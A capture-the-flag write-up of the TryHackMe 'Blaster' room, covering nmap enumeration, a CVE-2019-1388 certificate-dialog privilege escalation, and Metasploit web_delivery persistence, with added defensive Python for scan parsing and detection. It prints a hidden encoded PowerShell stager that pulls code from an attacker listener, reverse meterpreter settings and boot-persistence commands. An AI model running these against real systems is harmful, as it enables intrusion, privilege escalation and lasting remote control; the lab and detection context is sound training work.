TryHackMe: Blaster Write-up
Objective
Challenge Link: Blaster
The room objective is to look for alternative modes of exploitation without Metasploit or any exploitation tools in general beyond nmap and dirbuster. The vulnerability we will exploit is CVE-2019-1388.
Enumeration
I first started with a basic scan, but the host seems to block ping probes, so I skipped host discovery with the -Pn option.
nmap -Pn 10.10.119.236
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 10.10.119.236
Host is up (0.14s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 11.92 seconds
I also used the -A option to reveal more information about the services open on the target.
nmap -A -p80,3389 -n -Pn 10.10.119.236
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-21 09:17 EDT
Nmap scan report for 10.10.119.236
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RETROWEB
| NetBIOS_Domain_Name: RETROWEB
| NetBIOS_Computer_Name: RETROWEB
| DNS_Domain_Name: RetroWeb
| DNS_Computer_Name: RetroWeb
| Product_Version: 10.0.14393
|_ System_Time: 2025-07-21T13:17:39+00:00
| ssl-cert: Subject: commonName=RetroWeb
| Not valid before: 2025-07-20T12:50:17
|_Not valid after: 2026-01-19T12:50:17
|_ssl-date: 2025-07-21T13:17:44+00:00; +8s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (86%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
- Port 80 -> Running Microsoft IIS 10.0 (Windows web server)
- Port 3389 -> Running Microsoft Terminal Services (RDP)
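The scan output above is what a defender ends up recording as an exposure finding, so here is an added example (mine, not part of the write-up) of parsing nmap's normal output in Python: it pulls the port table and the indented NSE script blocks into a dict and derives findings from them. The input is a trimmed copy of the scan output shown on this page.

```python
import re
from typing import Dict, List

# Trimmed copy of the nmap -A output from the scan above.
NMAP_OUTPUT = """\
Nmap scan report for 10.10.119.236
Host is up (0.13s latency).
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: RETROWEB
|   DNS_Computer_Name: RetroWeb
|   Product_Version: 10.0.14393
|_  System_Time: 2025-07-21T13:17:39+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# "80/tcp   open  http   Microsoft IIS httpd 10.0" -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap(text: str) -> Dict[int, dict]:
    """Parse nmap normal output into {port: {state, service, version, scripts}}.

    NSE output lines start with "|"; "|_" marks the last line of a script block.
    A line that ends in ":" opens a multi-line script, indented lines belong to it,
    and "|_name: value" is a single-line script.
    """
    ports: Dict[int, dict] = {}
    current = None          # port entry being filled
    current_script = None   # multi-line NSE block being filled
    for raw in text.splitlines():
        m = PORT_RE.match(raw)
        if m:
            port = int(m.group(1))
            current = ports[port] = {
                "proto": m.group(2), "state": m.group(3),
                "service": m.group(4), "version": m.group(5).strip(), "scripts": {},
            }
            current_script = None
            continue
        if current is None or not raw.startswith("|"):
            continue
        closes = raw.startswith("|_")
        rest = raw[2:] if closes else raw[1:]
        indent = len(rest) - len(rest.lstrip(" "))
        body = rest.strip()
        if body.endswith(":") and ": " not in body:
            current_script = body[:-1]
            current["scripts"][current_script] = {}
        else:
            key, _, value = body.partition(": ")
            if indent >= 2 and current_script is not None:
                current["scripts"][current_script][key] = value
            else:
                current["scripts"][key] = value
        if closes:
            current_script = None
    return ports


def exposure_findings(ports: Dict[int, dict]) -> List[str]:
    """Turn parsed results into the findings a defender would track for this host."""
    findings = []
    for port, info in ports.items():
        if info["state"] != "open":
            continue
        risky = info["scripts"].get("http-methods", {}).get("Potentially risky methods")
        if risky:
            findings.append(f"{port}/{info['proto']}: HTTP methods {risky} enabled on {info['version']}")
        if info["service"] == "ms-wbt-server":
            host = info["scripts"].get("rdp-ntlm-info", {}).get("DNS_Computer_Name", "unknown")
            findings.append(f"{port}/{info['proto']}: RDP reachable from the scanner (host {host})")
    return findings


if __name__ == "__main__":
    for line in exposure_findings(parse_nmap(NMAP_OUTPUT)):
        print(line)
```

The rdp-ntlm-info block is worth keeping in the parsed record: it leaks the hostname and exact build (10.0.14393) before any authentication, which is the same information an attacker reads off it.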
Check the running web server first.
I used Dirsearch to search for hidden pages.
Clicking on the Tron Arcade Cabinet post shows that the blog was posted by Wade.
The error message from the login page confirms that the username is Wade, but we still need the password. Exploring the remaining pages, on the Ready Player One post Wade has left his password in the comment section.
Now that we have some credentials, let’s test them on the second open service: RDP.
RDP
Log in to the Windows machine remotely using the xfreerdp tool.
xfreerdp /u:wade /p:parzival /v:10.10.119.236
To find the internet history, look in Internet Explorer's history view. For some reason, it only shows me today's history.
Exploit CVE-2019-1388
CVE-2019-1388 is a privilege escalation vulnerability in the Windows Certificate Dialog. It occurs when a user runs a signed executable such as hhupd.exe and the dialog fails to enforce privilege separation correctly.
To exploit it:
- Double-click on hhupd.exe.
- In the prompt that appears, click “Show more details”.
- Then click “Show information about the publisher's certificate”.
- In the certificate window, click on the “Issued by” link.
- This opens Internet Explorer with elevated privileges.
- Press Ctrl + S to open the Save As window.
- In the File Explorer window, type cmd in the address bar and hit Enter. This gives you a command prompt with administrator privileges, effectively bypassing UAC.
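The steps above leave a distinctive process tree behind, which is how this bypass is detected. As an added example (mine, not from the room), this Python correlates process-creation records in the shape of Sysmon Event ID 1 and flags the chain. The records are constructed, and the rule rests on one assumption stated in the comments: the certificate dialog is hosted by consent.exe, the UAC consent process, so the elevated Internet Explorer shows up as its child and the shell as the browser's child.

```python
from typing import Dict, List, Tuple

# Constructed process-creation records (Sysmon Event ID 1 style); not real telemetry.
EVENTS: List[Dict] = [
    {"pid": 400,  "ppid": 1,    "image": r"C:\Windows\System32\svchost.exe", "user": r"NT AUTHORITY\SYSTEM"},
    {"pid": 4100, "ppid": 400,  "image": r"C:\Windows\explorer.exe", "user": r"RETROWEB\wade"},
    # Assumed: the certificate dialog runs inside consent.exe, the UAC consent host, as SYSTEM.
    {"pid": 4300, "ppid": 400,  "image": r"C:\Windows\System32\consent.exe", "user": r"NT AUTHORITY\SYSTEM"},
    # The "Issued by" link opens the browser from that host, so it inherits SYSTEM.
    {"pid": 4400, "ppid": 4300, "image": r"C:\Program Files\Internet Explorer\iexplore.exe", "user": r"NT AUTHORITY\SYSTEM"},
    # Typing cmd into the Save As address bar launches the shell as a child of the browser.
    {"pid": 4500, "ppid": 4400, "image": r"C:\Windows\System32\cmd.exe", "user": r"NT AUTHORITY\SYSTEM"},
    # Benign noise: the user's own browser session, launched from explorer.exe.
    {"pid": 4600, "ppid": 4100, "image": r"C:\Program Files\Internet Explorer\iexplore.exe", "user": r"RETROWEB\wade"},
]

BROWSERS = {"iexplore.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_certificate_dialog_bypass(events: List[Dict]) -> List[Tuple[str, int, str]]:
    """Return (finding, pid, user) for each event that matches a stage of the chain.

    Stage 1: the UAC consent host spawning a browser is never part of a normal
    elevation prompt. Stage 2: a browser spawning a shell; it is reported as the
    full CVE-2019-1388 chain when that browser is itself a child of consent.exe.
    """
    by_pid = {e["pid"]: e for e in events}
    alerts: List[Tuple[str, int, str]] = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        child, par = basename(e["image"]), basename(parent["image"])
        if par == "consent.exe" and child in BROWSERS:
            alerts.append(("UAC consent host spawned a browser", e["pid"], e["user"]))
        if par in BROWSERS and child in SHELLS:
            grandparent = by_pid.get(parent["ppid"])
            if grandparent is not None and basename(grandparent["image"]) == "consent.exe":
                alerts.append(("CVE-2019-1388 chain: consent.exe -> browser -> shell", e["pid"], e["user"]))
            else:
                alerts.append(("browser spawned a shell", e["pid"], e["user"]))
    return alerts


if __name__ == "__main__":
    for finding, pid, user in detect_certificate_dialog_bypass(EVENTS):
        print(f"[{user}] pid {pid}: {finding}")
```

Microsoft fixed the dialog in the November 2019 updates, so patching removes the vulnerability itself; the parent-child rule stays useful afterwards because consent.exe spawning a browser, or any SYSTEM browser spawning a shell, has no legitimate counterpart.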
Persistence
To establish persistence on the target machine, we will use the Metasploit module exploit/multi/script/web_delivery.
-> The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command: e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution.
msf6 exploit(multi/script/web_delivery) > show options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be a
n address on the local machine or 0.0.0.0 to listen on all addre
sses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Python
View the full module info with the info, or info -d command.
Set your LHOST and LPORT, and set the exploit target to PowerShell since Python is not installed on Windows by default.
msf6 exploit(multi/script/web_delivery) > set target 2
target => 2
msf6 exploit(multi/script/web_delivery) > show targets
Exploit targets:
=================
Id Name
-- ----
0 Python
1 PHP
=> 2 PSH
3 Regsvr32
4 pubprn
5 SyncAppvPublishingServer
6 PSH (Binary)
7 Linux
8 Mac OS X
Finally, set the payload:
msf6 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
A last check of the options:
msf6 exploit(multi/script/web_delivery) > show options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be a
n address on the local machine or 0.0.0.0 to listen on all addre
sses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_http):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.9.8.180 yes The local listener hostname
LPORT 80 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
2 PSH
View the full module info with the info, or info -d command.
Run the module:
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started HTTP reverse handler on http://10.9.8.180:80
[*] Using URL: http://10.9.8.180:8080/GtWFCGzoAD
[*] Server started.
[*] Run the following command on the target machine:
msf6 exploit(multi/script/web_delivery) > powershell.exe -nop -w hidden -e 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
Now we can copy the payload and paste it to the target machine with administrator privileges.
Once the payload runs on the target machine, a session will be created in our Metasploit console.
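The stager that web_delivery prints is an ordinary PowerShell command line, so it is also exactly what a defender sees in process-creation or command-line telemetry. As an added example (mine, not from the room or the module), this Python decodes the -EncodedCommand argument and scores the flag combination the stager uses. The sample command lines are constructed, and the encoded payload is a harmless Write-Output rather than a stager; only the flag shape mirrors the line above.

```python
import base64
from typing import List, Optional, Tuple


def encode_powershell(script: str) -> str:
    """Build an -EncodedCommand argument as PowerShell expects it: UTF-16LE text, base64-encoded."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command lines standing in for process-creation telemetry. The first mirrors the
# -nop -w hidden -e shape printed by web_delivery but wraps a harmless Write-Output.
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -e " + encode_powershell("Write-Output 'constructed sample'"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1",
    "powershell.exe -NoLogo -Command Get-Date",
]


def _is_prefix_of(token: str, full: str, min_len: int) -> bool:
    """PowerShell accepts any unambiguous prefix of a parameter name (-nop, -w, -e ...)."""
    return min_len <= len(token) <= len(full) and full.startswith(token)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if absent or malformed."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.startswith("-") and _is_prefix_of(tok[1:].lower(), "encodedcommand", 1):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def indicators(cmdline: str) -> List[str]:
    """List the launch flags commonly combined to hide a stager from the user."""
    tokens = cmdline.split()
    found: List[str] = []
    for i, tok in enumerate(tokens):
        if not tok.startswith("-"):
            continue
        t = tok[1:].lower()
        nxt = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        if _is_prefix_of(t, "noprofile", 3):
            found.append("NoProfile")
        elif _is_prefix_of(t, "windowstyle", 1) and nxt == "hidden":
            found.append("WindowStyle hidden")
        elif _is_prefix_of(t, "encodedcommand", 1):
            found.append("EncodedCommand")
        elif _is_prefix_of(t, "executionpolicy", 2) and nxt == "bypass":
            found.append("ExecutionPolicy Bypass")
    return found


def triage(cmdline: str) -> Tuple[str, List[str], Optional[str]]:
    """Severity, matched indicators, and the decoded script (when one is present)."""
    found = indicators(cmdline)
    decoded = decode_encoded_command(cmdline) if "EncodedCommand" in found else None
    if "EncodedCommand" in found and ({"NoProfile", "WindowStyle hidden"} & set(found)):
        level = "high"
    elif found:
        level = "medium"
    else:
        level = "low"
    return level, found, decoded


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        level, found, decoded = triage(line)
        print(f"{level:6} {found} decoded={decoded!r}")
```

Decoding matters more than the flag score: an encoded command that downloads and runs further code from an HTTP listener, as the web_delivery stager does, is only visible once the UTF-16LE payload is unpacked, and PowerShell Script Block Logging (Event ID 4104) records that decoded content as well.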
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
To start the agent automatically when the system boots, run these commands:
meterpreter > run persistence -X
meterpreter > run persistence -U -i 5 -p 80 -r 10.9.8.180